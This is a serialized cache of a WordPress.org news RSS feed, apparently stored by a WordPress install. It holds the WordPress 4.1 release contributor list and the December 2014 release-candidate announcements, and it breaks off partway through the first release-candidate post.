<a href=\"https://profiles.wordpress.org/barrykooij\">Barry Kooij</a>, <a href=\"https://profiles.wordpress.org/empireoflight\">Ben Dunkle</a>, <a href=\"https://profiles.wordpress.org/benjmay\">Ben May</a>, <a href=\"https://profiles.wordpress.org/neoxx\">Bernhard Riedl</a>, <a href=\"https://profiles.wordpress.org/birgire\">Birgir Erlendsson (birgire)</a>, <a href=\"https://profiles.wordpress.org/bobbingwide\">bobbingwide</a>, <a href=\"https://profiles.wordpress.org/boonebgorges\">Boone B. Gorges</a>, <a href=\"https://profiles.wordpress.org/bradyvercher\">Brady Vercher</a>, <a href=\"https://profiles.wordpress.org/bramd\">Bram Duvigneau</a>, <a href=\"https://profiles.wordpress.org/kraftbj\">Brandon Kraft</a>, <a href=\"https://profiles.wordpress.org/briandichiara\">Brian DiChiara</a>, <a href=\"https://profiles.wordpress.org/rzen\">Brian Richards</a>, <a href=\"https://profiles.wordpress.org/bswatson\">Brian Watson</a>, <a href=\"https://profiles.wordpress.org/camdensegal\">Camden Segal</a>, <a href=\"https://profiles.wordpress.org/captaintheme\">Captain Theme</a>, <a href=\"https://profiles.wordpress.org/hiwhatsup\">Carlos</a>, <a href=\"https://profiles.wordpress.org/caspie\">Caspie</a>, <a href=\"https://profiles.wordpress.org/ccprice\">ccprice</a>, <a href=\"https://profiles.wordpress.org/mackensen\">Charles Fulton</a>, <a href=\"https://profiles.wordpress.org/chrico\">ChriCo</a>, <a href=\"https://profiles.wordpress.org/aprea\">Chris Aprea</a>, <a href=\"https://profiles.wordpress.org/chrisbliss18\">Chris Jean</a>, <a href=\"https://profiles.wordpress.org/cmmarslender\">Chris Marslender</a>, <a href=\"https://profiles.wordpress.org/jazzs3quence\">Chris Reynolds</a>, <a href=\"https://profiles.wordpress.org/chriscct7\">chriscct7</a>, <a href=\"https://profiles.wordpress.org/chrisl27\">chrisl27</a>, <a href=\"https://profiles.wordpress.org/cfoellmann\">Christian Foellmann</a>, <a href=\"https://profiles.wordpress.org/cfinke\">Christopher Finke</a>, <a href=\"https://profiles.wordpress.org/cyclometh\">Corey Snow</a>, <a href=\"https://profiles.wordpress.org/corphi\">Corphi</a>, <a href=\"https://profiles.wordpress.org/curtjen\">curtjen</a>, <a href=\"https://profiles.wordpress.org/colorful-tones\">Damon Cook</a>, <a href=\"https://profiles.wordpress.org/dancameron\">Dan Cameron</a>, <a href=\"https://profiles.wordpress.org/danielbachhuber\">Daniel Bachhuber</a>, <a href=\"https://profiles.wordpress.org/convissor\">Daniel Convissor</a>, <a href=\"https://profiles.wordpress.org/nerrad\">Darren Ethier (nerrad)</a>, <a href=\"https://profiles.wordpress.org/koop\">Daryl Koopersmith</a>, <a href=\"https://profiles.wordpress.org/dmchale\">Dave McHale</a>, <a href=\"https://profiles.wordpress.org/davidakennedy\">David A. Kennedy</a>, <a href=\"https://profiles.wordpress.org/dlh\">David Herrera</a>, <a href=\"https://profiles.wordpress.org/davidjlaietta\">David Laietta</a>, <a href=\"https://profiles.wordpress.org/technical_mastermind\">David Wood</a>, <a href=\"https://profiles.wordpress.org/davidthemachine\">DavidTheMachine</a>, <a href=\"https://profiles.wordpress.org/dcavins\">dcavins</a>, <a href=\"https://profiles.wordpress.org/realloc\">Dennis Ploetner</a>, <a href=\"https://profiles.wordpress.org/dd32\">Dion Hulse</a>, <a href=\"https://profiles.wordpress.org/wedi\">Dirk Weise</a>, <a href=\"https://profiles.wordpress.org/ocean90\">Dominik Schilling</a>, <a href=\"https://profiles.wordpress.org/dominikschwind-1\">Dominik Schwind</a>, <a href=\"https://profiles.wordpress.org/drewapicture\">Drew Jaynes</a>, <a href=\"https://profiles.wordpress.org/dustyf\">Dustin Filippini</a>, <a href=\"https://profiles.wordpress.org/dustinhartzler\">Dustin Hartzler</a>, <a href=\"https://profiles.wordpress.org/eliorivero\">Elio Rivero</a>, <a href=\"https://profiles.wordpress.org/ebinnion\">Eric Binnion</a>, <a href=\"https://profiles.wordpress.org/ew_holmes\">Eric Holmes</a>, <a href=\"https://profiles.wordpress.org/ericlewis\">Eric Lewis</a>, <a href=\"https://profiles.wordpress.org/fab1en\">Fabien Quatravaux</a>, <a href=\"https://profiles.wordpress.org/florianziegler\">Florian Ziegler</a>, <a href=\"https://profiles.wordpress.org/hereswhatidid\">Gabe Shackle</a>, <a href=\"https://profiles.wordpress.org/garyc40\">Gary Cao</a>, <a href=\"https://profiles.wordpress.org/pento\">Gary Pendergast</a>, <a href=\"https://profiles.wordpress.org/soulseekah\">Gennady Kovshenin</a>, <a href=\"https://profiles.wordpress.org/babbardel\">George Olaru</a>, <a href=\"https://profiles.wordpress.org/georgestephanis\">George Stephanis</a>, <a href=\"https://profiles.wordpress.org/gregrickaby\">Greg Rickaby</a>, <a href=\"https://profiles.wordpress.org/gcorne\">Gregory Cornelius</a>, <a href=\"https://profiles.wordpress.org/tivnet\">Gregory Karpinsky (@tivnet)</a>, <a href=\"https://profiles.wordpress.org/bordoni\">Gustavo Bordoni</a>, <a href=\"https://profiles.wordpress.org/hardy101\">hardy101</a>, <a href=\"https://profiles.wordpress.org/hauvong\">hauvong</a>, <a href=\"https://profiles.wordpress.org/helen\">Helen Hou-Sandí</a>, <a href=\"https://profiles.wordpress.org/heshiming\">heshiming</a>, <a href=\"https://profiles.wordpress.org/honeysilvas\">honeysilvas</a>, <a href=\"https://profiles.wordpress.org/hugodelgado\">hugodelgado</a>, <a href=\"https://profiles.wordpress.org/iandstewart\">Ian Stewart</a>, <a href=\"https://profiles.wordpress.org/ianmjones\">ianmjones</a>, <a href=\"https://profiles.wordpress.org/igmoweb\">Ignacio Cruz Moreno</a>, <a href=\"https://profiles.wordpress.org/imath\">imath</a>, <a href=\"https://profiles.wordpress.org/ipstenu\">Ipstenu (Mika Epstein)</a>, <a href=\"https://profiles.wordpress.org/ivankristianto\">Ivan Kristianto</a>, <a href=\"https://profiles.wordpress.org/jdgrimes\">J.D. Grimes</a>, <a href=\"https://profiles.wordpress.org/jaimieolmstead\">jaimieolmstead</a>, <a href=\"https://profiles.wordpress.org/jakubtyrcha\">jakub.tyrcha</a>, <a href=\"https://profiles.wordpress.org/janhenckens\">janhenckens</a>, <a href=\"https://profiles.wordpress.org/avryl\">Janneke Van Dorpe</a>, <a href=\"https://profiles.wordpress.org/japh\">Japh</a>, <a href=\"https://profiles.wordpress.org/jwenerd\">Jared Wenerd</a>, <a href=\"https://profiles.wordpress.org/jarednova\">jarednova</a>, <a href=\"https://profiles.wordpress.org/jeanyoungkim\">jeanyoungkim</a>, <a href=\"https://profiles.wordpress.org/jfarthing84\">Jeff Farthing</a>, <a href=\"https://profiles.wordpress.org/jeffstieler\">Jeff Stieler</a>, <a href=\"https://profiles.wordpress.org/jeremyfelt\">Jeremy Felt</a>, <a href=\"https://profiles.wordpress.org/jeherve\">Jeremy Herve</a>, <a href=\"https://profiles.wordpress.org/jesin\">Jesin A</a>, <a href=\"https://profiles.wordpress.org/jayjdk\">Jesper Johansen (jayjdk)</a>, <a href=\"https://profiles.wordpress.org/engelen\">Jesper van Engelen</a>, <a href=\"https://profiles.wordpress.org/jessepollak\">Jesse Pollak</a>, <a href=\"https://profiles.wordpress.org/jipmoors\">jipmoors</a>, <a href=\"https://profiles.wordpress.org/joedolson\">Joe Dolson</a>, <a href=\"https://profiles.wordpress.org/joemcgill\">Joe McGill</a>, <a href=\"https://profiles.wordpress.org/johneckman\">John Eckman</a>, <a href=\"https://profiles.wordpress.org/johnrom\">johnrom</a>, <a href=\"https://profiles.wordpress.org/johnstonphilip\">johnstonphilip</a>, <a href=\"https://profiles.wordpress.org/jb510\">Jon Brown</a>, <a href=\"https://profiles.wordpress.org/duck_\">Jon Cave</a>, <a href=\"https://profiles.wordpress.org/jbrinley\">Jonathan Brinley</a>, <a href=\"https://profiles.wordpress.org/desrosj\">Jonathan Desrosiers</a>, <a href=\"https://profiles.wordpress.org/joostdevalk\">Joost de Valk</a>, <a href=\"https://profiles.wordpress.org/softmodeling\">Jordi Cabot</a>, <a href=\"https://profiles.wordpress.org/joshuaabenazer\">Joshua Abenazer</a>, <a href=\"https://profiles.wordpress.org/tai\">JOTAKI Taisuke</a>, <a href=\"https://profiles.wordpress.org/jrf\">jrf</a>, <a href=\"https://profiles.wordpress.org/julien731\">Julien Liabeuf</a>, <a href=\"https://profiles.wordpress.org/justinsainton\">Justin Sainton</a>, <a href=\"https://profiles.wordpress.org/jtsternberg\">Justin Sternberg</a>, <a href=\"https://profiles.wordpress.org/kadamwhite\">K.Adam White</a>, <a href=\"https://profiles.wordpress.org/trepmal\">Kailey (trepmal)</a>, <a href=\"https://profiles.wordpress.org/kamelkev\">kamelkev</a>, <a href=\"https://profiles.wordpress.org/karpstrucking\">karpstrucking</a>, <a href=\"https://profiles.wordpress.org/keesiemeijer\">keesiemeijer</a>, <a href=\"https://profiles.wordpress.org/ryelle\">Kelly Dwan</a>, <a href=\"https://profiles.wordpress.org/kevinlangleyjr\">Kevin Langley</a>, <a href=\"https://profiles.wordpress.org/kdoran\">Kiko Doran</a>, <a href=\"https://profiles.wordpress.org/kpdesign\">Kim Parsell</a>, <a href=\"https://profiles.wordpress.org/kwight\">Kirk Wight</a>, <a href=\"https://profiles.wordpress.org/kitchin\">kitchin</a>, <a href=\"https://profiles.wordpress.org/ixkaito\">Kite</a>, <a href=\"https://profiles.wordpress.org/knutsp\">Knut Sparhell</a>, <a href=\"https://profiles.wordpress.org/kovshenin\">Konstantin Kovshenin</a>, <a href=\"https://profiles.wordpress.org/obenland\">Konstantin Obenland</a>, <a href=\"https://profiles.wordpress.org/kosvrouvas\">Kostas Vrouvas</a>, <a href=\"https://profiles.wordpress.org/kraftner\">kraftner</a>, <a href=\"https://profiles.wordpress.org/kristastevens\">kristastevens</a>, <a href=\"https://profiles.wordpress.org/kurtpayne\">Kurt Payne</a>, <a href=\"https://profiles.wordpress.org/lancewillett\">Lance Willett</a>, <a href=\"https://profiles.wordpress.org/offereins\">Laurens Offereins</a>, <a href=\"https://profiles.wordpress.org/linuxologos\">linuxologos</a>, <a href=\"https://profiles.wordpress.org/ideag\">Liuiza Arunas</a>, <a href=\"https://profiles.wordpress.org/loushou\">loushou</a>, <a href=\"https://profiles.wordpress.org/latz\">Lutz Schroer</a>, <a href=\"https://profiles.wordpress.org/manoz69\">Manoz69</a>, <a href=\"https://profiles.wordpress.org/mantismamita\">mantismamita</a>, <a href=\"https://profiles.wordpress.org/marcosf\">Marco Schmoecker</a>, <a href=\"https://profiles.wordpress.org/nofearinc\">Mario Peshev</a>, <a href=\"https://profiles.wordpress.org/clorith\">Marius (Clorith)</a>, <a href=\"https://profiles.wordpress.org/landakram\">Mark Hudnall</a>, <a href=\"https://profiles.wordpress.org/markjaquith\">Mark Jaquith</a>, <a href=\"https://profiles.wordpress.org/senff\">Mark Senff</a>, <a href=\"https://profiles.wordpress.org/markoheijnen\">Marko Heijnen</a>, <a href=\"https://profiles.wordpress.org/marsjaninzmarsa\">marsjaninzmarsa</a>, <a href=\"https://profiles.wordpress.org/matveb\">Matias Ventura</a>, <a href=\"https://profiles.wordpress.org/matt\">Matt Mullenweg</a>, <a href=\"https://profiles.wordpress.org/mattwiebe\">Matt Wiebe</a>, <a href=\"https://profiles.wordpress.org/mboynes\">Matthew Boynes</a>, <a href=\"https://profiles.wordpress.org/mattheu\">Matthew Haines-Young</a>, <a href=\"https://profiles.wordpress.org/mattkeys\">mattkeys</a>, <a href=\"https://profiles.wordpress.org/mlteal\">Maura Teal</a>, <a href=\"https://profiles.wordpress.org/melchoyce\">Mel Choyce</a>, <a href=\"https://profiles.wordpress.org/merty\">Mert Yazicioglu</a>, <a href=\"https://profiles.wordpress.org/mdawaffe\">Michael Adams (mdawaffe)</a>, <a href=\"https://profiles.wordpress.org/michael-arestad\">Michael Arestad</a>, <a href=\"https://profiles.wordpress.org/tw2113\">Michael Beckwith</a>, <a href=\"https://profiles.wordpress.org/cainm\">Michael Cain</a>, <a href=\"https://profiles.wordpress.org/smashcut\">Michael Pick</a>, <a href=\"https://profiles.wordpress.org/michalzuber\">michalzuber</a>, <a href=\"https://profiles.wordpress.org/chellycat\">Michelle Langston</a>, <a href=\"https://profiles.wordpress.org/mcsf\">Miguel Fonseca</a>, <a href=\"https://profiles.wordpress.org/mikehansenme\">Mike Hansen</a>, <a href=\"https://profiles.wordpress.org/mikejolley\">Mike Jolley</a>, <a href=\"https://profiles.wordpress.org/mnelson4\">Mike Nelson</a>, <a href=\"https://profiles.wordpress.org/dh-shredder\">Mike Schroder</a>, <a href=\"https://profiles.wordpress.org/mikeyarce\">Mikey Arce</a>, <a href=\"https://profiles.wordpress.org/studionashvegas\">Mitch Canter (studionashvegas)</a>, <a href=\"https://profiles.wordpress.org/morganestes\">Morgan Estes</a>, <a href=\"https://profiles.wordpress.org/mor10\">Morten Rand-Hendriksen</a>, <a href=\"https://profiles.wordpress.org/mvd7793\">mvd7793</a>, <a href=\"https://profiles.wordpress.org/alex-ye\">Nashwan Doaqan</a>, <a href=\"https://profiles.wordpress.org/niallkennedy\">Niall Kennedy</a>, <a href=\"https://profiles.wordpress.org/celloexpressions\">Nick Halsey</a>, <a href=\"https://profiles.wordpress.org/nikv\">Nikhil Vimal (NikV)</a>, <a href=\"https://profiles.wordpress.org/nikolovtmw\">Nikola Nikolov</a>, <a href=\"https://profiles.wordpress.org/nobleclem\">nobleclem</a>, <a href=\"https://profiles.wordpress.org/noplanman\">noplanman</a>, <a href=\"https://profiles.wordpress.org/nvwd\">Nowell VanHoesen</a>, <a href=\"https://profiles.wordpress.org/originalexe\">OriginalEXE</a>, <a href=\"https://profiles.wordpress.org/p_enrique\">p_enrique</a>, <a href=\"https://profiles.wordpress.org/pushplaybang\">Paul</a>, <a href=\"https://profiles.wordpress.org/pauldewouters\">Paul de Wouters</a>, <a href=\"https://profiles.wordpress.org/paulschreiber\">Paul Schreiber</a>, <a href=\"https://profiles.wordpress.org/paulwilde\">Paul Wilde</a>, <a href=\"https://profiles.wordpress.org/pavelevap\">pavelevap</a>, <a href=\"https://profiles.wordpress.org/peterchester\">Peter Chester</a>, <a href=\"https://profiles.wordpress.org/donutz\">Peter J. Herrel</a>, <a href=\"https://profiles.wordpress.org/westi\">Peter Westwood</a>, <a href=\"https://profiles.wordpress.org/peterwilsoncc\">Peter Wilson</a>, <a href=\"https://profiles.wordpress.org/philiparthurmoore\">Philip Arthur Moore</a>, <a href=\"https://profiles.wordpress.org/phpmypython\">phpmypython</a>, <a href=\"https://profiles.wordpress.org/mordauk\">Pippin Williamson</a>, <a href=\"https://profiles.wordpress.org/nprasath002\">Prasath Nadarajah</a>, <a href=\"https://profiles.wordpress.org/psycleuk\">psycleuk</a>, <a href=\"https://profiles.wordpress.org/ptahdunbar\">Ptah Dunbar</a>, <a href=\"https://profiles.wordpress.org/quietnic\">quietnic</a>, <a href=\"https://profiles.wordpress.org/rachelbaker\">Rachel Baker</a>, <a href=\"https://profiles.wordpress.org/ramiy\">Rami Yushuvaev</a>, <a href=\"https://profiles.wordpress.org/ramiabraham\">ramiabraham</a>, <a href=\"https://profiles.wordpress.org/greuben\">Reuben Gunday</a>, <a href=\"https://profiles.wordpress.org/rianrietveld\">Rian Rietveld</a>, <a href=\"https://profiles.wordpress.org/richardmtl\">Richard Archambault</a>, <a href=\"https://profiles.wordpress.org/rickalee\">Ricky Lee Whittemore</a>, <a href=\"https://profiles.wordpress.org/miqrogroove\">Robert Chapin</a>, <a href=\"https://profiles.wordpress.org/rodrigosprimo\">Rodrigo Primo</a>, <a href=\"https://profiles.wordpress.org/ryan\">Ryan Boren</a>, <a href=\"https://profiles.wordpress.org/ryankienstra\">Ryan Kienstra</a>, <a href=\"https://profiles.wordpress.org/rmccue\">Ryan McCue</a>, <a href=\"https://profiles.wordpress.org/sakinshrestha\">Sakin Shrestha</a>, <a href=\"https://profiles.wordpress.org/samhotchkiss\">Sam Hotchkiss</a>, <a href=\"https://profiles.wordpress.org/otto42\">Samuel Wood (Otto)</a>, <a href=\"https://profiles.wordpress.org/sc0ttkclark\">Scott Kingsley Clark</a>, <a href=\"https://profiles.wordpress.org/coffee2code\">Scott Reilly</a>, <a href=\"https://profiles.wordpress.org/wonderboymusic\">Scott Taylor</a>, <a href=\"https://profiles.wordpress.org/sergeybiryukov\">Sergey Biryukov</a>, <a href=\"https://profiles.wordpress.org/shooper\">Shawn Hooper</a>, <a href=\"https://profiles.wordpress.org/simonp303\">Simon Pollard</a>, <a href=\"https://profiles.wordpress.org/simonwheatley\">Simon Wheatley</a>, <a href=\"https://profiles.wordpress.org/skaeser\">skaeser</a>, <a href=\"https://profiles.wordpress.org/slobodanmanic\">Slobodan Manic</a>, <a href=\"https://profiles.wordpress.org/socki03\">socki03</a>, <a href=\"https://profiles.wordpress.org/solarissmoke\">solarissmoke</a>, <a href=\"https://profiles.wordpress.org/stephdau\">Stephane Daury</a>, <a href=\"https://profiles.wordpress.org/netweb\">Stephen Edgar</a>, <a href=\"https://profiles.wordpress.org/stephenharris\">Stephen Harris</a>, <a href=\"https://profiles.wordpress.org/stevegrunwell\">Steve Grunwell</a>, <a href=\"https://profiles.wordpress.org/5um17\">Sumit Singh</a>, <a href=\"https://profiles.wordpress.org/tacoverdo\">TacoVerdo</a>, <a href=\"https://profiles.wordpress.org/iamtakashi\">Takashi Irie</a>, <a href=\"https://profiles.wordpress.org/miyauchi\">Takayuki Miyauchi</a>, <a href=\"https://profiles.wordpress.org/karmatosed\">Tammie</a>, <a href=\"https://profiles.wordpress.org/tareq1988\">Tareq Hasan</a>, <a href=\"https://profiles.wordpress.org/tlovett1\">Taylor Lovett</a>, <a href=\"https://profiles.wordpress.org/ipm-frommen\">Thorsten Frommen</a>, <a href=\"https://profiles.wordpress.org/tillkruess\">Till Kruss</a>, <a href=\"https://profiles.wordpress.org/tschutter\">Tobias Schutter</a>, <a href=\"https://profiles.wordpress.org/tobiasbg\">TobiasBg</a>, <a href=\"https://profiles.wordpress.org/tmtrademark\">Toby McKes</a>, <a href=\"https://profiles.wordpress.org/tjnowell\">Tom J Nowell</a>, <a href=\"https://profiles.wordpress.org/tomasm\">Tomas Mackevicius</a>, <a href=\"https://profiles.wordpress.org/tomharrigan\">TomHarrigan</a>, <a href=\"https://profiles.wordpress.org/topher1kenobe\">Topher</a>, <a href=\"https://profiles.wordpress.org/zodiac1978\">Torsten Landsiedel</a>, <a href=\"https://profiles.wordpress.org/liljimmi\">Tracy Levesque</a>, <a href=\"https://profiles.wordpress.org/transom\">transom</a>, <a href=\"https://profiles.wordpress.org/wpsmith\">Travis Smith</a>, <a href=\"https://profiles.wordpress.org/tywayne\">Ty Carlson</a>, <a href=\"https://profiles.wordpress.org/desaiuditd\">Udit Desai</a>, <a href=\"https://profiles.wordpress.org/umeshsingla\">Umesh Kumar</a>, <a href=\"https://profiles.wordpress.org/vinod-dalvi\">Vinod Dalvi</a>, <a href=\"https://profiles.wordpress.org/vlajos\">vlajos</a>, <a href=\"https://profiles.wordpress.org/voldemortensen\">voldemortensen</a>, <a href=\"https://profiles.wordpress.org/westonruter\">Weston Ruter</a>, <a href=\"https://profiles.wordpress.org/yoavf\">Yoav Farhi</a>, <a href=\"https://profiles.wordpress.org/nobinobi\">Yuta Sekine</a>, <a href=\"https://profiles.wordpress.org/zrothauser\">Zack Rothauser</a>, and <a href=\"https://profiles.wordpress.org/tollmanz\">Zack Tollman</a>.\n<p>There were 283 contributors to this release, again a new high.</p>\n<p>If you want to help out or follow along, check out <a href=\"https://make.wordpress.org/\">Make WordPress</a> and our <a href=\"https://make.wordpress.org/core/\">core development blog</a>.</p>\n<p>Thanks for choosing WordPress. Happy holidays and see you next year for version 4.2!</p>\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:36:\"http://wellformedweb.org/CommentAPI/\";a:1:{s:10:\"commentRss\";a:1:{i:0;a:5:{s:4:\"data\";s:46:\"https://wordpress.org/news/2014/12/dinah/feed/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:38:\"http://purl.org/rss/1.0/modules/slash/\";a:1:{s:8:\"comments\";a:1:{i:0;a:5:{s:4:\"data\";s:1:\"0\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:1;a:6:{s:4:\"data\";s:45:\"\n		\n		\n		\n		\n		\n				\n		\n\n		\n		\n				\n			\n		\n		\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:5:{s:0:\"\";a:7:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:33:\"WordPress 4.1 Release Candidate 3\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:69:\"https://wordpress.org/news/2014/12/wordpress-4-1-release-candidate-3/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:8:\"comments\";a:1:{i:0;a:5:{s:4:\"data\";s:78:\"https://wordpress.org/news/2014/12/wordpress-4-1-release-candidate-3/#comments\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Thu, 18 Dec 2014 02:22:15 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:8:\"category\";a:2:{i:0;a:5:{s:4:\"data\";s:11:\"Development\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}i:1;a:5:{s:4:\"data\";s:8:\"Releases\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:33:\"http://wordpress.org/news/?p=3411\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:429:\"The next release candidate for WordPress 4.1 is now available for testing. Seventy changes have gone in since the first release candidate. With no known issues left, we plan to release 4.1 tomorrow, December 18. To test, try the WordPress Beta Tester plugin (you&#8217;ll want &#8220;bleeding edge nightlies&#8221;). Or you can download the release candidate here (zip). If you&#8217;d like to learn more about [&#8230;]\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:15:\"John Blackbourn\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:40:\"http://purl.org/rss/1.0/modules/content/\";a:1:{s:7:\"encoded\";a:1:{i:0;a:5:{s:4:\"data\";s:1465:\"<p>The next release candidate for WordPress 4.1 is now available for testing.</p>\n<p><a href=\"https://core.trac.wordpress.org/log/trunk?rev=30961&amp;stop_rev=30827\">Seventy changes</a> have gone in since the <a href=\"https://wordpress.org/news/2014/12/wordpress-4-1-release-candidate/\">first release candidate</a>. With no known issues left, we plan to release 4.1 tomorrow, December 18.</p>\n<p>To test, try the <a href=\"https://wordpress.org/plugins/wordpress-beta-tester/\">WordPress Beta Tester</a> plugin (you&#8217;ll want &#8220;bleeding edge nightlies&#8221;). Or you can <a href=\"https://wordpress.org/wordpress-4.1-RC3.zip\">download the release candidate here</a> (zip). If you&#8217;d like to learn more about what&#8217;s new in WordPress 4.1, visit the updated About screen in your dashboard (<strong><img src=\"https://i0.wp.com/core.svn.wordpress.org/branches/3.6/wp-content/themes/twentyten/images/wordpress.png\" alt=\"\" width=\"16\" height=\"16\" /> → About</strong> in the toolbar) and also check out <a href=\"https://wordpress.org/news/2014/11/wordpress-4-1-beta-1/\">the Beta 1 post</a>.</p>\n<p><strong>Plugin authors:</strong> Remember to test your plugins against 4.1, and if they&#8217;re compatible, make sure they are marked as tested up to 4.1. Be sure to follow along the core development blog; we&#8217;ve been posting <a href=\"https://make.wordpress.org/core/tag/4-1-dev-notes/\">notes for developers for 4.1</a> as always.</p>\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:36:\"http://wellformedweb.org/CommentAPI/\";a:1:{s:10:\"commentRss\";a:1:{i:0;a:5:{s:4:\"data\";s:74:\"https://wordpress.org/news/2014/12/wordpress-4-1-release-candidate-3/feed/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:38:\"http://purl.org/rss/1.0/modules/slash/\";a:1:{s:8:\"comments\";a:1:{i:0;a:5:{s:4:\"data\";s:1:\"0\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:2;a:6:{s:4:\"data\";s:45:\"\n		\n		\n		\n		\n		\n				\n		\n\n		\n		\n				\n			\n		\n		\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:5:{s:0:\"\";a:7:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"WordPress 4.1 Release Candidate\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:67:\"https://wordpress.org/news/2014/12/wordpress-4-1-release-candidate/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:8:\"comments\";a:1:{i:0;a:5:{s:4:\"data\";s:76:\"https://wordpress.org/news/2014/12/wordpress-4-1-release-candidate/#comments\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Thu, 11 Dec 2014 11:52:16 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:8:\"category\";a:2:{i:0;a:5:{s:4:\"data\";s:8:\"Releases\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}i:1;a:5:{s:4:\"data\";s:3:\"4.1\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:33:\"http://wordpress.org/news/?p=3375\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:341:\"The release candidate for WordPress 4.1 is now available. We&#8217;ve made a lot of refinements over the last few weeks. RC means we think we’re done, but with millions of users and thousands of plugins and themes, it’s possible we’ve missed something. We hope to ship WordPress 4.1 on Tuesday, December 16, but we need your [&#8230;]\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:15:\"John Blackbourn\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:40:\"http://purl.org/rss/1.0/modules/content/\";a:1:{s:7:\"encoded\";a:1:{i:0;a:5:{s:4:\"data\";s:2301:\"<p>The release candidate for WordPress 4.1 is now available.</p>\n<p>We&#8217;ve made a lot of refinements over the last few weeks. RC means we think we’re done, but with millions of users and thousands of plugins and themes, it’s possible we’ve missed something. We hope to ship WordPress 4.1 on Tuesday, December 16, but we need your help to get there. If you haven’t tested 4.1 yet, now is the time! (Please though, not on your live site unless you’re adventurous.)</p>\n<p><strong>Think you&#8217;ve found a bug?</strong> Please post to the <a 